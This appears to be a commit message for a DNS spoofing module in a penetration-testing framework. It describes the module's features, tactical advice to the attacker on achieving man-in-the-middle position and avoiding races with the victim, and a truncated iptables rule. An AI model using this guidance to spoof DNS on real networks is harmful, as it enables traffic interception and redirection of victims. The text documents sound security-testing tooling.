DNS spoofing module should be feature complete, with forwarding of
requests which do not have cached answers (can be disabled same as
the native server module), empty replies to reduce client wait on
outstanding DNS requests, and post-send output in verbose mode
to reduce garbage and execution time in the critical/racy path.
This module is best used in conditions where MITM is achieved by
way of MAC spoofing, route interception, or compromise of an inline
host on the datapath. The attacker should avoid forwarding
original requests to the intended destination, or if this is not
possible, prevent replies from traversing the MITM space in order
to avoid race conditions between the spoofer and victim.
Example iptables configuration on MITM host:
iptables -t nat -A POSTROUTING -o eth0 -p udp ! --dport 53 -j ...
Testing:
Internal testing in Virtualbox local network, atop 802.11, and
mostly in Neutron (with port security disabled on the VIFs) atop
OpenStack Liberty ML2+OVS.
RageLtMan
1a253f92a1